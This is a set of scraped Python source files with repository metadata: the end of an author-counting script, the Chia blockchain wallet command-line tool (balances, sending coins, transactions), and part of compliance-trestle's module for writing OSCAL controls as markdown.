for i in range(len(title)):
title[i] = title[i][10:-1]
for i in range(len(author)):
author[i] = author[i][21:-7]
author_list.append(author[i].split(', '))
# for i in range(len(publisher)):
# publisher[i] = publisher[i][27:-5]
# for i in range(len(title)):
# print(title[i])
# print(author[i])
# print('')
def readAuthor(name):
global authors
global authorDict
global index
if name not in authorDict:
newAut = Author()
newAut.name = name
authors.append(newAut)
authorDict[name] = index
index += 1
authors[authorDict[name]].artNum += 1
for each_art in author_list:
for each_author in each_art:
readAuthor(each_author)
cmpfun = operator.attrgetter('artNum','name')
authors.sort(key = cmpfun,reverse = True)
for author in authors:
if author.name[-1] == '\n':
author.name = author.name[:-1]
print(f'{author.name} 参与了 {author.artNum} 篇论文') | 30.904762 | 148 | 0.641757 |
4a1f6393afc0c1602de77252c9b400adba146aad | 14,158 | py | Python | src/cmds/wallet.py | Quexington/chia-blockchain | d3ea1f119004749d8a65d292214e7856de1539c3 | [
"Apache-2.0"
] | null | null | null | src/cmds/wallet.py | Quexington/chia-blockchain | d3ea1f119004749d8a65d292214e7856de1539c3 | [
"Apache-2.0"
] | null | null | null | src/cmds/wallet.py | Quexington/chia-blockchain | d3ea1f119004749d8a65d292214e7856de1539c3 | [
"Apache-2.0"
] | null | null | null | import click
import sys
import time
from datetime import datetime
from typing import Tuple, Optional, Callable, List
import aiohttp
import asyncio
from src.rpc.wallet_rpc_client import WalletRpcClient
from src.server.start_wallet import SERVICE_NAME
from src.util.bech32m import encode_puzzle_hash
from src.util.byte_types import hexstr_to_bytes
from src.util.config import load_config, load_config_cli
from src.util.default_root import DEFAULT_ROOT_PATH
from src.util.ints import uint64, uint16
from src.wallet.transaction_record import TransactionRecord
from src.wallet.util.wallet_types import WalletType
from src.cmds.units import units
from decimal import Decimal
def print_transaction(tx: TransactionRecord, verbose: bool, name) -> None:
if verbose:
print(tx)
else:
chia_amount = Decimal(int(tx.amount)) / units["chia"]
to_address = encode_puzzle_hash(tx.to_puzzle_hash, name)
print(f"Transaction {tx.name}")
print(f"Status: {'Confirmed' if tx.confirmed else ('In mempool' if tx.is_in_mempool() else 'Pending')}")
print(f"Amount: {chia_amount} {name}")
print(f"To address: {to_address}")
print("Created at:", datetime.fromtimestamp(tx.created_at_time).strftime("%Y-%m-%d %H:%M:%S"))
print("")
async def get_transaction(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
wallet_id = args["id"]
transaction_id = hexstr_to_bytes(args["tx_id"])
config = load_config_cli(DEFAULT_ROOT_PATH, "config.yaml", SERVICE_NAME)
name = config["network_overrides"]["config"][config["selected_network"]]["address_prefix"]
tx: TransactionRecord = await wallet_client.get_transaction(wallet_id, transaction_id=transaction_id)
print_transaction(tx, verbose=(args["verbose"] > 0), name=name)
async def get_transactions(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
wallet_id = args["id"]
txs: List[TransactionRecord] = await wallet_client.get_transactions(wallet_id)
config = load_config_cli(DEFAULT_ROOT_PATH, "config.yaml", SERVICE_NAME)
name = config["network_overrides"]["config"][config["selected_network"]]["address_prefix"]
if len(txs) == 0:
print("There are no transactions to this address")
for i in range(0, len(txs), 5):
for j in range(0, 5):
print_transaction(txs[i + j], verbose=(args["verbose"] > 0), name=name)
print("Press q to quit, or c to continue")
while True:
entered_key = sys.stdin.read(1)
if entered_key == "q":
return
elif entered_key == "c":
break
async def send(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
wallet_id = args["id"]
amount = Decimal(args["amount"])
fee = Decimal(args["fee"])
address = args["address"]
print("Submitting transaction...")
final_amount = uint64(int(amount * units["chia"]))
final_fee = uint64(int(fee * units["chia"]))
res = await wallet_client.send_transaction(wallet_id, final_amount, address, final_fee)
tx_id = res.name
start = time.time()
while time.time() - start < 10:
await asyncio.sleep(0.1)
tx = await wallet_client.get_transaction(wallet_id, tx_id)
if len(tx.sent_to) > 0:
print(f"Transaction submitted to nodes: {tx.sent_to}")
print(f"Do chia wallet get_transaction -f {fingerprint} -tx 0x{tx_id} to get status")
return
print("Transaction not yet submitted to nodes")
print(f"Do 'chia wallet get_transaction -f {fingerprint} -tx 0x{tx_id}' to get status")
async def get_address(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
wallet_id = args["id"]
res = await wallet_client.get_next_address(wallet_id)
print(res)
async def print_balances(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
summaries_response = await wallet_client.get_wallets()
print(f"Wallet height: {await wallet_client.get_height_info()}")
print(f"Balances, fingerprint: {fingerprint}")
for summary in summaries_response:
wallet_id = summary["id"]
balances = await wallet_client.get_wallet_balance(wallet_id)
typ = WalletType(int(summary["type"])).name
if typ != "STANDARD_WALLET":
print(f"Wallet ID {wallet_id} type {typ} {summary['name']}")
print(f" -Confirmed: " f"{balances['confirmed_wallet_balance']/units['colouredcoin']}")
print(f" -Unconfirmed: {balances['unconfirmed_wallet_balance']/units['colouredcoin']}")
print(f" -Spendable: {balances['spendable_balance']/units['colouredcoin']}")
print(f" -Pending change: {balances['pending_change']/units['colouredcoin']}")
else:
print(f"Wallet ID {wallet_id} type {typ}")
print(
f" -Confirmed: {balances['confirmed_wallet_balance']} mojo "
f"({balances['confirmed_wallet_balance']/units['chia']} TXCH)"
)
print(
f" -Unconfirmed: {balances['unconfirmed_wallet_balance']} mojo "
f"({balances['unconfirmed_wallet_balance']/units['chia']} TXCH)"
)
print(
f" -Spendable: {balances['spendable_balance']} mojo "
f"({balances['spendable_balance']/units['chia']} TXCH)"
)
print(
f" -Pending change: {balances['pending_change']} mojo "
f"({balances['pending_change']/units['chia']} TXCH)"
)
async def get_wallet(wallet_client: WalletRpcClient, fingerprint: int = None) -> Optional[Tuple[WalletRpcClient, int]]:
fingerprints = await wallet_client.get_public_keys()
if len(fingerprints) == 0:
print("No keys loaded. Run 'chia keys generate' or import a key")
return None
if fingerprint is not None:
if fingerprint not in fingerprints:
print(f"Fingerprint {fingerprint} does not exist")
return None
if len(fingerprints) == 1:
fingerprint = fingerprints[0]
if fingerprint is not None:
log_in_response = await wallet_client.log_in(fingerprint)
else:
print("Choose wallet key:")
for i, fp in enumerate(fingerprints):
print(f"{i+1}) {fp}")
val = None
while val is None:
val = input("Enter a number to pick or q to quit: ")
if val == "q":
return None
if not val.isdigit():
val = None
else:
index = int(val) - 1
if index >= len(fingerprints):
print("Invalid value")
val = None
continue
else:
fingerprint = fingerprints[index]
assert fingerprint is not None
log_in_response = await wallet_client.log_in(fingerprint)
if log_in_response["success"] is False:
if log_in_response["error"] == "not_initialized":
use_cloud = True
if "backup_path" in log_in_response:
path = log_in_response["backup_path"]
print(f"Backup file from backup.chia.net downloaded and written to: {path}")
val = input("Do you want to use this file to restore from backup? (Y/N) ")
if val.lower() == "y":
log_in_response = await wallet_client.log_in_and_restore(fingerprint, path)
else:
use_cloud = False
if "backup_path" not in log_in_response or use_cloud is False:
if use_cloud is True:
val = input(
"No online backup file found, \n Press S to skip restore from backup"
" \n Press F to use your own backup file: "
)
else:
val = input(
"Cloud backup declined, \n Press S to skip restore from backup"
" \n Press F to use your own backup file: "
)
if val.lower() == "s":
log_in_response = await wallet_client.log_in_and_skip(fingerprint)
elif val.lower() == "f":
val = input("Please provide the full path to your backup file: ")
log_in_response = await wallet_client.log_in_and_restore(fingerprint, val)
if "success" not in log_in_response or log_in_response["success"] is False:
if "error" in log_in_response:
error = log_in_response["error"]
print(f"Error: {log_in_response[error]}")
return None
return wallet_client, fingerprint
async def execute_with_wallet(wallet_rpc_port: int, fingerprint: int, extra_params: dict, function: Callable) -> None:
try:
config = load_config(DEFAULT_ROOT_PATH, "config.yaml")
self_hostname = config["self_hostname"]
if wallet_rpc_port is None:
wallet_rpc_port = config["wallet"]["rpc_port"]
wallet_client = await WalletRpcClient.create(self_hostname, uint16(wallet_rpc_port), DEFAULT_ROOT_PATH, config)
wallet_client_f = await get_wallet(wallet_client, fingerprint=fingerprint)
if wallet_client_f is None:
wallet_client.close()
await wallet_client.await_closed()
return
wallet_client, fingerprint = wallet_client_f
await function(extra_params, wallet_client, fingerprint)
except Exception as e:
if isinstance(e, aiohttp.client_exceptions.ClientConnectorError):
print(f"Connection error. Check if wallet is running at {wallet_rpc_port}")
else:
print(f"Exception from 'wallet' {e}")
wallet_client.close()
await wallet_client.await_closed()
@click.group("wallet", short_help="Manage your wallet")
def wallet_cmd() -> None:
pass
@wallet_cmd.command("get_transaction", short_help="Get a transaction")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
@click.option("-i", "--id", help="Id of the wallet to use", type=int, default=1, show_default=True, required=True)
@click.option("-tx", "--tx_id", help="transaction id to search for", type=str, required=True)
@click.option("--verbose", "-v", count=True, type=int)
def get_transaction_cmd(wallet_rpc_port: int, fingerprint: int, id: int, tx_id: str, verbose: int) -> None:
extra_params = {"id": id, "tx_id": tx_id, "verbose": verbose}
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, extra_params, get_transaction))
@wallet_cmd.command("get_transactions", short_help="Get all transactions")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
@click.option("-i", "--id", help="Id of the wallet to use", type=int, default=1, show_default=True, required=True)
@click.option("--verbose", "-v", count=True, type=int)
def get_transactions_cmd(wallet_rpc_port: int, fingerprint: int, id: int, verbose: bool) -> None:
extra_params = {"id": id, "verbose": verbose}
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, extra_params, get_transactions))
@wallet_cmd.command("send", short_help="Send chia to another wallet")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
@click.option("-i", "--id", help="Id of the wallet to use", type=int, default=1, show_default=True, required=True)
@click.option("-a", "--amount", help="How much chia to send, in TXCH/XCH", type=str, required=True)
@click.option(
"-m", "--fee", help="Set the fees for the transaction", type=str, default="0", show_default=True, required=True
)
@click.option("-t", "--address", help="Address to send the TXCH/XCH", type=str, required=True)
def send_cmd(wallet_rpc_port: int, fingerprint: int, id: int, amount: str, fee: str, address: str) -> None:
extra_params = {"id": id, "amount": amount, "fee": fee, "address": address}
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, extra_params, send))
@wallet_cmd.command("show", short_help="Show wallet information")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
def show_cmd(wallet_rpc_port: int, fingerprint: int) -> None:
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, {}, print_balances))
@wallet_cmd.command("get_address", short_help="Get a wallet receive address")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-i", "--id", help="Id of the wallet to use", type=int, default=1, show_default=True, required=True)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
def get_address_cmd(wallet_rpc_port: int, id, fingerprint: int) -> None:
extra_params = {"id": id}
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, extra_params, get_address))
| 44.662461 | 119 | 0.651575 |
4a1f63b43ea4ad051fa4826b728ab8c6817145b1 | 53,713 | py | Python | trestle/core/control_io.py | jayhawk87/compliance-trestle | d0262826f30e0c7f89f8a3551b93142669fa2c66 | [
"Apache-2.0"
] | null | null | null | trestle/core/control_io.py | jayhawk87/compliance-trestle | d0262826f30e0c7f89f8a3551b93142669fa2c66 | [
"Apache-2.0"
] | null | null | null | trestle/core/control_io.py | jayhawk87/compliance-trestle | d0262826f30e0c7f89f8a3551b93142669fa2c66 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 IBM Corp. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handle direct i/o reading and writing controls as markdown."""
import copy
import logging
import pathlib
import re
import string
from datetime import datetime
from typing import Any, Dict, List, Optional, Tuple, Union
import frontmatter
import trestle.oscal.catalog as cat
import trestle.oscal.ssp as ossp
from trestle.core import const
from trestle.core import generators as gens
from trestle.core.err import TrestleError
from trestle.core.markdown.markdown_api import MarkdownAPI
from trestle.core.markdown.markdown_processor import MarkdownNode
from trestle.core.markdown.md_writer import MDWriter
from trestle.core.utils import as_list, none_if_empty, spaces_and_caps_to_snake
from trestle.oscal import common
from trestle.oscal import profile as prof
logger = logging.getLogger(__name__)
class ControlIOWriter():
"""Class to write controls as markdown."""
def __init__(self):
"""Initialize the class."""
self._md_file: Optional[MDWriter] = None
@staticmethod
def _wrap_label(label: str):
l_side = '\['
r_side = '\]'
wrapped = '' if label == '' else f'{l_side}{label}{r_side}'
return wrapped
@staticmethod
def _get_label(part: common.Part) -> str:
"""Get the label from the props of a part."""
if part.props is not None:
for prop in part.props:
if prop.name == 'label':
return prop.value.strip()
return ''
def _get_part(self, part: common.Part, item_type: str, skip_id: Optional[str]) -> List[Union[str, List[str]]]:
"""
Find parts with the specified item type, within the given part.
For a part in a control find the parts in it that match the item_type
Return list of string formatted labels and associated descriptive prose
"""
items = []
if part.name in ['statement', item_type]:
# the options here are to force the label to be the part.id or the part.label
# the label may be of the form (a) while the part.id is ac-1_smt.a.1.a
# here we choose the latter and extract the final element
label = part.id.split('.')[-1]
wrapped_label = self._wrap_label(label)
pad = '' if wrapped_label == '' or not part.prose else ' '
prose = '' if part.prose is None else part.prose
# top level prose has already been written out, if present
# use presence of . in id to tell if this is top level prose
if part.id != skip_id:
items.append(f'{wrapped_label}{pad}{prose}')
if part.parts:
sub_list = []
for prt in part.parts:
sub_list.extend(self._get_part(prt, item_type, skip_id))
sub_list.append('')
items.append(sub_list)
return items
def _add_part_and_its_items(self, control: cat.Control, name: str, item_type: str) -> None:
"""For a given control add its one statement and its items to the md file after replacing params."""
items = []
if control.parts:
for part in control.parts:
if part.name == name:
# If the part has prose write it as a raw line and not list element
skip_id = part.id
if part.prose:
# need to avoid split lines in statement items
self._md_file.new_line(part.prose.replace('\n', ' '))
items.append(self._get_part(part, item_type, skip_id))
# unwrap the list if it is many levels deep
while not isinstance(items, str) and len(items) == 1:
items = items[0]
self._md_file.new_paragraph()
self._md_file.new_list(items)
def _add_yaml_header(self, yaml_header: Optional[Dict]) -> None:
if yaml_header:
self._md_file.add_yaml_header(yaml_header)
@staticmethod
def _gap_join(a_str: str, b_str: str) -> str:
a_clean = a_str.strip()
b_clean = b_str.strip()
if not b_clean:
return a_clean
gap = '\n' if a_clean else ''
return a_clean + gap + b_clean
def _add_control_statement(self, control: cat.Control, group_title: str) -> None:
"""Add the control statement and items to the md file."""
self._md_file.new_paragraph()
title = f'{control.id} - \[{group_title}\] {control.title}'
self._md_file.new_header(level=1, title=title)
self._md_file.new_header(level=2, title='Control Statement')
self._md_file.set_indent_level(-1)
self._add_part_and_its_items(control, 'statement', 'item')
self._md_file.set_indent_level(-1)
def _add_control_statement_ssp(self, control: cat.Control) -> None:
"""Add the control statement and items to the markdown SSP."""
self._md_file.new_paragraph()
label = self._get_label(control) if self._get_label(control) != '' else control.id.upper()
title = f'{label} - {control.title}'
self._md_file.new_header(level=1, title=title)
self._md_file.new_header(level=2, title='Control Statement')
self._md_file.set_indent_level(-1)
self._add_part_and_its_items(control, 'statement', 'item')
self._md_file.set_indent_level(-1)
def _add_control_objective(self, control: cat.Control) -> None:
if control.parts:
for part in control.parts:
if part.name == 'objective':
self._md_file.new_paragraph()
self._md_file.new_header(level=2, title='Control Objective')
self._md_file.set_indent_level(-1)
self._add_part_and_its_items(control, 'objective', 'objective')
self._md_file.set_indent_level(-1)
return
@staticmethod
def _get_control_section_part(part: common.Part, section: str) -> str:
"""Get the prose for a named section in the control."""
prose = ''
if part.name == section and part.prose is not None:
prose = ControlIOWriter._gap_join(prose, part.prose)
if part.parts:
for sub_part in part.parts:
prose = ControlIOWriter._gap_join(prose, ControlIOWriter._get_control_section_part(sub_part, section))
return prose
@staticmethod
def _get_control_section(control: cat.Control, section: str) -> str:
prose = ''
if control.parts:
for part in control.parts:
prose = ControlIOWriter._gap_join(prose, ControlIOWriter._get_control_section_part(part, section))
return prose
@staticmethod
def _find_section_info(part: common.Part, section_list: List[str]):
"""Find section not in list."""
if part.prose and part.name not in section_list:
return part.id, part.name
if part.parts:
for part in part.parts:
id_, name = ControlIOWriter._find_section_info(part, section_list)
if id_:
return id_, name
return '', ''
@staticmethod
def _find_section(control: cat.Control, section_list: List[str]) -> Tuple[str, str]:
"""Find next section not in list."""
if control.parts:
for part in control.parts:
id_, name = ControlIOWriter._find_section_info(part, section_list)
if id_:
return id_, name
return '', ''
@staticmethod
def _get_section(control: cat.Control, section_list: List[str]) -> Tuple[str, str, str]:
"""Get sections that are not in the list."""
id_, name = ControlIOWriter._find_section(control, section_list)
if id_:
return id_, name, ControlIOWriter._get_control_section(control, name)
return '', '', ''
def _add_sections(self, control: cat.Control) -> None:
"""Add the extra control sections after the main ones."""
skip_section_list = ['statement', 'item', 'objective']
while True:
name, id_, prose = self._get_section(control, skip_section_list)
if not name:
return
if prose:
skip_section_list.append(id_)
if self._sections and id_ in self._sections:
id_ = self._sections[id_]
self._md_file.new_header(level=2, title=f'Control {id_}')
self._md_file.new_line(prose)
self._md_file.new_paragraph()
def _insert_existing_text(self, part_label: str, existing_text: Dict[str, List[str]]) -> None:
"""Insert text captured in the previous markdown and reinsert to avoid overwrite."""
if part_label in existing_text:
self._md_file.new_paragraph()
for line in existing_text[part_label]:
self._md_file.new_line(line)
def _add_response(self, control: cat.Control, comp_dict: Dict[str, Dict[str, List[str]]]) -> None:
"""Add the response request text for all parts to the markdown along with the header."""
self._md_file.new_hr()
self._md_file.new_paragraph()
self._md_file.new_header(level=2, title=f'{const.SSP_MD_IMPLEMENTATION_QUESTION}')
# if the control has no parts written out then enter implementation in the top level entry
# but if it does have parts written out, leave top level blank and provide details in the parts
# Note that parts corresponding to sections don't get written out here so a check is needed
# If we have responses per component then enter them in separate ### sections
did_write_part = False
if control.parts:
for part in control.parts:
if part.parts:
if part.name == 'statement':
for prt in part.parts:
if prt.name != 'item':
continue
if not did_write_part:
self._md_file.new_line(const.SSP_MD_LEAVE_BLANK_TEXT)
# insert extra line to make mdformat happy
self._md_file._add_line_raw('')
self._md_file.new_hr()
part_label = self._get_label(prt)
# if no label guess the label from the sub-part id
if not part_label:
part_label = prt.id.split('.')[-1]
self._md_file.new_header(level=2, title=f'Implementation {part_label}')
added_content = False
for comp_name, prose_dict in comp_dict.items():
if part_label in prose_dict:
if comp_name != const.SSP_MAIN_COMP_NAME:
self._md_file.new_header(level=3, title=comp_name)
self._insert_existing_text(part_label, prose_dict)
added_content = True
self._md_file.new_paragraph()
if not added_content:
self._md_file.new_line(f'{const.SSP_ADD_IMPLEMENTATION_FOR_ITEM_TEXT} {prt.id}')
did_write_part = True
# if we loaded nothing for this control yet then it must need a fresh prompt for the control statement
if not comp_dict and not did_write_part:
self._md_file.new_line(f'{const.SSP_ADD_IMPLEMENTATION_FOR_CONTROL_TEXT} {control.id}')
part_label = 'Statement'
for comp_name, prose_dict in comp_dict.items():
if part_label in prose_dict:
if comp_name != const.SSP_MAIN_COMP_NAME:
self._md_file.new_header(level=3, title=comp_name)
self._insert_existing_text(part_label, prose_dict)
self._md_file.new_hr()
@staticmethod
def _get_adds(control_id: str, profile: prof.Profile) -> List[Tuple[str, str]]:
adds = []
if profile and profile.modify and profile.modify.alters:
for alter in profile.modify.alters:
if alter.control_id == control_id and alter.adds:
for add in alter.adds:
if add.parts:
for part in add.parts:
if part.prose:
adds.append((part.name, part.prose))
return adds
def _add_additional_content(self, control: cat.Control, profile: prof.Profile) -> None:
adds = ControlIOWriter._get_adds(control.id, profile)
has_content = len(adds) > 0
self._md_file.new_header(level=1, title='Editable Content')
self._md_file.new_line('<!-- Make additions and edits below -->')
self._md_file.new_line(
'<!-- The above represents the contents of the control as received by the profile, prior to additions. -->' # noqa E501
)
self._md_file.new_line(
'<!-- If the profile makes additions to the control, they will appear below. -->' # noqa E501
)
self._md_file.new_line(
'<!-- The above may not be edited but you may edit the content below, and/or introduce new additions to be made by the profile. -->' # noqa E501
)
self._md_file.new_line(
'<!-- The content here will then replace what is in the profile for this control, after running profile-assemble. -->' # noqa E501
)
if has_content:
self._md_file.new_line(
'<!-- The added parts in the profile for this control are below. You may edit them and/or add new ones. -->' # noqa E501
)
else:
self._md_file.new_line(
'<!-- The current profile has no added parts for this control, but you may add new ones here. -->'
)
self._md_file.new_line('<!-- Each addition must have a heading of the form ## Control my_addition_name -->')
self._md_file.new_line(
'<!-- See https://ibm.github.io/compliance-trestle/tutorials/ssp_profile_catalog_authoring/ssp_profile_catalog_authoring for guidance. -->' # noqa E501
)
# next is to make mdformat happy
self._md_file._add_line_raw('')
for add in adds:
name, prose = add
self._md_file.new_header(level=2, title=f'Control {name}')
self._md_file.new_paraline(prose)
@staticmethod
def get_part_prose(control: cat.Control, part_name: str) -> str:
"""Get the prose for a named part."""
prose = ''
if control.parts:
for part in control.parts:
prose += ControlIOWriter._get_control_section_part(part, part_name)
return prose.strip()
@staticmethod
def merge_dicts_deep(dest: Dict[Any, Any], src: Dict[Any, Any], preserve_dest_values: bool) -> None:
"""
Merge dict src into dest.
New items are always added from src to dest.
Items present in both will not override dest if preserve_dest_values is True.
"""
for key in src.keys():
if key in dest:
# if they are both dicts, recurse
if isinstance(dest[key], dict) and isinstance(src[key], dict):
ControlIOWriter.merge_dicts_deep(dest[key], src[key], preserve_dest_values)
# otherwise override dest if needed
elif not preserve_dest_values:
dest[key] = src[key]
else:
# if the item was not already in dest, add it from src
dest[key] = src[key]
def write_control(
self,
dest_path: pathlib.Path,
control: cat.Control,
group_title: str,
yaml_header: Optional[Dict],
sections: Optional[Dict[str, str]],
additional_content: bool,
prompt_responses: bool,
profile: Optional[prof.Profile],
preserve_header_values: bool,
) -> None:
"""
Write out the control in markdown format into the specified directory.
Args:
dest_path: Path to the directory where the control will be written
control: The control to write as markdown
group_title: Title of the group containing the control
yaml_header: Optional dict to be written as markdown yaml header
sections: Optional string lookup dict mapping section abbrev. to pretty version for display
additional_content: Should the additional content be printed corresponding to profile adds
prompt_responses: Should the markdown include prompts for implementation detail responses
profile: Profile containing the adds making up additional content
preserve_header_values: Retain existing values in markdown header content but add new content
Returns:
None
Notes:
The filename is constructed from the control's id, so only the markdown directory is required.
If a yaml header is present in the file, new values in provided header replace those in the markdown header.
But if preserve_header_values then don't change any existing values, but allow addition of new content.
The above only applies to generic header content and not sections of type x-trestle-
"""
control_file = dest_path / (control.id + '.md')
existing_text, header = ControlIOReader.read_all_implementation_prose_and_header(control_file)
self._md_file = MDWriter(control_file)
self._sections = sections
merged_header = copy.deepcopy(header)
if yaml_header:
ControlIOWriter.merge_dicts_deep(merged_header, yaml_header, preserve_header_values)
self._add_yaml_header(merged_header)
self._add_control_statement(control, group_title)
self._add_control_objective(control)
self._add_sections(control)
if prompt_responses:
self._add_response(control, existing_text)
if additional_content:
self._add_additional_content(control, profile)
self._md_file.write_out()
def get_control_statement(self, control: cat.Control) -> List[str]:
"""Get back the formatted control from a catalog."""
self._md_file = MDWriter(None)
self._add_control_statement_ssp(control)
return self._md_file.get_lines()
def get_params(self, control: cat.Control) -> List[str]:
"""Get parameters for control."""
reader = ControlIOReader()
param_dict = reader.get_control_param_dict(control, False)
if param_dict:
self._md_file = MDWriter(None)
self._md_file.new_paragraph()
self._md_file.set_indent_level(-1)
self._md_file.new_table([[key, param_dict[key]] for key in param_dict.keys()], ['Parameter ID', 'Value'])
self._md_file.set_indent_level(-1)
return self._md_file.get_lines()
return []
class ControlIOReader():
"""Class to read controls from markdown."""
@staticmethod
def _strip_to_make_ncname(label: str) -> str:
"""Strip chars to conform with NCNAME regex."""
orig_label = label
# make sure first char is allowed
while label and label[0] not in const.NCNAME_UTF8_FIRST_CHAR_OPTIONS:
label = label[1:]
new_label = label[:1]
# now check remaining chars
if len(label) > 1:
for ii in range(1, len(label)):
if label[ii] in const.NCNAME_UTF8_OTHER_CHAR_OPTIONS:
new_label += label[ii]
# do final check to confirm it is NCNAME
match = re.search(const.NCNAME_REGEX, new_label)
if not match:
raise TrestleError(f'Unable to convert label {orig_label} to NCNAME format.')
return new_label
@staticmethod
def param_values_as_string(set_param: prof.SetParameter) -> str:
"""Convert param values to single string."""
return 'None' if not set_param.values else ', '.join(v.__root__ for v in set_param.values)
@staticmethod
def _load_control_lines_and_header(control_file: pathlib.Path) -> Tuple[List[str], Dict[str, Any]]:
lines: List[str] = []
try:
content = control_file.open('r', encoding=const.FILE_ENCODING).read()
except UnicodeDecodeError as e:
logger.error('utf-8 decoding failed.')
logger.error(f'See: {const.WEBSITE_ROOT}/errors/#utf-8-encoding-only')
logger.debug(f'Underlying exception {e}')
raise TrestleError('Unable to load file due to utf-8 encoding issues.')
try:
fm = frontmatter.loads(content)
except Exception as e:
logger.error(f'Error parsing yaml header from file {control_file}')
logger.error('This is most likely due to an incorrect yaml structure.')
logger.debug(f'Underlying error: {str(e)}')
raise TrestleError(f'Failure parsing yaml header on file {control_file}')
raw_lines = fm.content.split('\n')
header = fm.metadata
# Any fully blank lines will be retained but as empty strings
lines = [line.strip('\r\n').rstrip() for line in raw_lines]
clean_lines = []
# need to keep indentation and empty lines
for line in lines:
if line.startswith('<!--') or line.startswith('__________________'):
continue
clean_lines.append(line)
return clean_lines, header
@staticmethod
def _read_id_group_id_title(line: str) -> Tuple[int, str, str]:
"""Process the line and find the control id, group id and control title."""
if line.count('-') < 2:
raise TrestleError(f'Markdown control title format error: {line}')
control_id = line.split()[1]
first_dash = line.find('-')
title_line = line[first_dash + 1:]
group_start = title_line.find('\[')
group_end = title_line.find('\]')
if group_start < 0 or group_end < 0 or group_start > group_end:
raise TrestleError(f'unable to read group and title for control {control_id}')
group_id = title_line[group_start + 2:group_end].strip()
control_title = title_line[group_end + 2:].strip()
return control_id, group_id, control_title
@staticmethod
def _indent(line: str) -> int:
"""Measure indent of non-empty line."""
if not line:
raise TrestleError('Empty line queried for indent.')
if line[0] not in [' ', '-']:
return -1
for ii in range(len(line)):
if line[ii] == '-':
return ii
# if line is indented it must start with -
if line[ii] != ' ':
break
raise TrestleError(f'List elements must start with -: {line}')
@staticmethod
def _get_next_line(ii: int, lines: List[str]) -> Tuple[int, str]:
while ii < len(lines):
line = lines[ii]
if line:
return ii, line
ii += 1
return -1, ''
@staticmethod
def _get_next_indent(ii: int, lines: List[str]) -> Tuple[int, int, str]:
"""Seek to next content line. ii remains at line read."""
while 0 <= ii < len(lines):
line = lines[ii]
if line:
if line[0] == '#':
return ii, -1, line
indent = ControlIOReader._indent(line)
if indent >= 0:
# extract text after -
start = indent + 1
while start < len(line) and line[start] != ' ':
start += 1
if start >= len(line):
raise TrestleError(f'Invalid line {line}')
return ii, indent, line[start:]
return ii, indent, line
ii += 1
return ii, -1, ''
@staticmethod
def _read_part_id_prose(line: str) -> Tuple[str, str]:
"""Extract the part id letter or number and prose from line."""
start = line.find('\\[')
end = line.find('\\]')
prose = line.strip() if start < 0 else line[end + 2:].strip()
id_ = '' if start < 0 or end < 0 else line[start + 2:end]
return id_, prose
@staticmethod
def _bump_label(label: str) -> str:
"""
Find next label given a string of 1 or more pure letters or digits.
The input must be either a string of digits or a string of ascii letters - or empty string.
"""
if not label:
return 'a'
if label[0] in string.digits:
return str(int(label) + 1)
if len(label) == 1 and label[0].lower() < 'z':
return chr(ord(label[0]) + 1)
# if this happens to be a string of letters, force it lowercase and bump
label = label.lower()
factor = 1
value = 0
# delta is needed because a counts as 0 when first value on right, but 1 for all others
delta = 0
for letter in label[::-1]:
value += (ord(letter) - ord('a') + delta) * factor
factor *= 26
delta = 1
value += 1
new_label = ''
delta = 0
while value > 0:
new_label += chr(ord('a') + value % 26 - delta)
value = value // 26
delta = 1
return new_label[::-1]
@staticmethod
def _create_next_label(prev_label: str, indent: int) -> str:
"""
Create new label at indent level based on previous label if available.
If previous label is available, make this the next one in the sequence.
Otherwise start with a or 1 on alternate levels of indentation.
If alphabetic label reaches z, next one is aa.
Numeric ranges from 1 to 9, then 10 etc.
"""
if not prev_label:
# assume indent goes in steps of 2
return ['a', '1'][(indent // 2) % 2]
label_prefix = ''
label_suffix = prev_label
is_char = prev_label[-1] in string.ascii_letters
# if it isn't ending in letter or digit just append 'a' to end
if not is_char and prev_label[-1] not in string.digits:
return prev_label + 'a'
# break in middle of string if mixed types
if len(prev_label) > 1:
ii = len(prev_label) - 1
while ii >= 0:
if prev_label[ii] not in string.ascii_letters + string.digits:
break
if (prev_label[ii] in string.ascii_letters) != is_char:
break
ii -= 1
if ii >= 0:
label_prefix = prev_label[:(ii + 1)]
label_suffix = prev_label[(ii + 1):]
return label_prefix + ControlIOReader._bump_label(label_suffix)
@staticmethod
